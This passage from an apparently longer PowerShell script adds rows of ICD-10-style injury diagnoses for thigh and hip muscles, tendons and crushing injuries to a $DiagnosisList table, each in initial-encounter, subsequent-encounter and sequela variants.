$null = $DiagnosisList.Rows.Add("Strain of unspecified quadriceps muscle, fascia and tendon","Strain of unspecified quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of right quadriceps muscle, fascia and tendon","Laceration of right quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right quadriceps muscle, fascia and tendon","Laceration of right quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of right quadriceps muscle, fascia and tendon","Laceration of right quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of left quadriceps muscle, fascia and tendon","Laceration of left quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left quadriceps muscle, fascia and tendon","Laceration of left quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of left quadriceps muscle, fascia and tendon","Laceration of left quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified quadriceps muscle, fascia and tendon","Laceration of unspecified quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified quadriceps muscle, fascia and tendon","Laceration of unspecified quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified quadriceps muscle, fascia and tendon","Laceration of unspecified quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of right quadriceps muscle, fascia and tendon","Other specified injury of right quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right quadriceps muscle, fascia and tendon","Other specified injury of right quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of right quadriceps muscle, fascia and tendon","Other specified injury of right quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of left quadriceps muscle, fascia and tendon","Other specified injury of left quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left quadriceps muscle, fascia and tendon","Other specified injury of left quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of left quadriceps muscle, fascia and tendon","Other specified injury of left quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified quadriceps muscle, fascia and tendon","Other specified injury of unspecified quadriceps muscle, fascia and tendon, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified quadriceps muscle, fascia and tendon","Other specified injury of unspecified quadriceps muscle, fascia and tendon, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified quadriceps muscle, fascia and tendon","Other specified injury of unspecified quadriceps muscle, fascia and tendon, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of right thigh","Unspecified injury of adductor muscle, fascia and tendon of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of right thigh","Unspecified injury of adductor muscle, fascia and tendon of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of right thigh","Unspecified injury of adductor muscle, fascia and tendon of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of left thigh","Unspecified injury of adductor muscle, fascia and tendon of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of left thigh","Unspecified injury of adductor muscle, fascia and tendon of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of left thigh","Unspecified injury of adductor muscle, fascia and tendon of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of unspecified thigh","Unspecified injury of adductor muscle, fascia and tendon of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of unspecified thigh","Unspecified injury of adductor muscle, fascia and tendon of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of adductor muscle, fascia and tendon of unspecified thigh","Unspecified injury of adductor muscle, fascia and tendon of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of right thigh","Strain of adductor muscle, fascia and tendon of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of right thigh","Strain of adductor muscle, fascia and tendon of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of right thigh","Strain of adductor muscle, fascia and tendon of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of left thigh","Strain of adductor muscle, fascia and tendon of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of left thigh","Strain of adductor muscle, fascia and tendon of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of left thigh","Strain of adductor muscle, fascia and tendon of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of unspecified thigh","Strain of adductor muscle, fascia and tendon of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of unspecified thigh","Strain of adductor muscle, fascia and tendon of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of adductor muscle, fascia and tendon of unspecified thigh","Strain of adductor muscle, fascia and tendon of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of right thigh","Laceration of adductor muscle, fascia and tendon of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of right thigh","Laceration of adductor muscle, fascia and tendon of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of right thigh","Laceration of adductor muscle, fascia and tendon of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of left thigh","Laceration of adductor muscle, fascia and tendon of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of left thigh","Laceration of adductor muscle, fascia and tendon of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of left thigh","Laceration of adductor muscle, fascia and tendon of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of unspecified thigh","Laceration of adductor muscle, fascia and tendon of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of unspecified thigh","Laceration of adductor muscle, fascia and tendon of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of adductor muscle, fascia and tendon of unspecified thigh","Laceration of adductor muscle, fascia and tendon of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of right thigh","Other injury of adductor muscle, fascia and tendon of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of right thigh","Other injury of adductor muscle, fascia and tendon of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of right thigh","Other injury of adductor muscle, fascia and tendon of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of left thigh","Other injury of adductor muscle, fascia and tendon of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of left thigh","Other injury of adductor muscle, fascia and tendon of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of left thigh","Other injury of adductor muscle, fascia and tendon of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of unspecified thigh","Other injury of adductor muscle, fascia and tendon of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of unspecified thigh","Other injury of adductor muscle, fascia and tendon of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of adductor muscle, fascia and tendon of unspecified thigh","Other injury of adductor muscle, fascia and tendon of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Unspecified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Strain of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Laceration of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh","Other specified injury of muscle, fascia and tendon of the posterior muscle group at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, right thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, right thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, right thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, left thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, left thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, left thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Unspecified injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, right thigh","Strain of other specified muscles, fascia and tendons at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, right thigh","Strain of other specified muscles, fascia and tendons at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, right thigh","Strain of other specified muscles, fascia and tendons at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, left thigh","Strain of other specified muscles, fascia and tendons at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, left thigh","Strain of other specified muscles, fascia and tendons at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, left thigh","Strain of other specified muscles, fascia and tendons at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Strain of other specified muscles, fascia and tendons at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Strain of other specified muscles, fascia and tendons at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Strain of other specified muscles, fascia and tendons at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, right thigh","Laceration of other specified muscles, fascia and tendons at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, right thigh","Laceration of other specified muscles, fascia and tendons at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, right thigh","Laceration of other specified muscles, fascia and tendons at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, left thigh","Laceration of other specified muscles, fascia and tendons at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, left thigh","Laceration of other specified muscles, fascia and tendons at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, left thigh","Laceration of other specified muscles, fascia and tendons at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Laceration of other specified muscles, fascia and tendons at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Laceration of other specified muscles, fascia and tendons at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Laceration of other specified muscles, fascia and tendons at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, right thigh","Other injury of other specified muscles, fascia and tendons at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, right thigh","Other injury of other specified muscles, fascia and tendons at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, right thigh","Other injury of other specified muscles, fascia and tendons at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, left thigh","Other injury of other specified muscles, fascia and tendons at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, left thigh","Other injury of other specified muscles, fascia and tendons at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, left thigh","Other injury of other specified muscles, fascia and tendons at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Other injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Other injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh","Other injury of other specified muscles, fascia and tendons at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, right thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, right thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, right thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, left thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, left thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, left thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Unspecified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, right thigh","Strain of unspecified muscles, fascia and tendons at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, right thigh","Strain of unspecified muscles, fascia and tendons at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, right thigh","Strain of unspecified muscles, fascia and tendons at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, left thigh","Strain of unspecified muscles, fascia and tendons at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, left thigh","Strain of unspecified muscles, fascia and tendons at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, left thigh","Strain of unspecified muscles, fascia and tendons at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Strain of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Strain of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Strain of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Strain of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, right thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, right thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, right thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, left thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, left thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, left thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Laceration of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, right thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, right thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, right thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, left thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, left thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, left thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh","Other specified injury of unspecified muscles, fascia and tendons at thigh level, unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hip","Crushing injury of unspecified hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hip","Crushing injury of unspecified hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified hip","Crushing injury of unspecified hip, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hip","Crushing injury of right hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hip","Crushing injury of right hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of right hip","Crushing injury of right hip, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hip","Crushing injury of left hip, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hip","Crushing injury of left hip, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushing injury of left hip","Crushing injury of left hip, sequela") + $null = $DiagnosisList.Rows.Add("Crushing injury of unspecified thigh","Crushing injury of unspecified thigh, initial encounter") + $null = 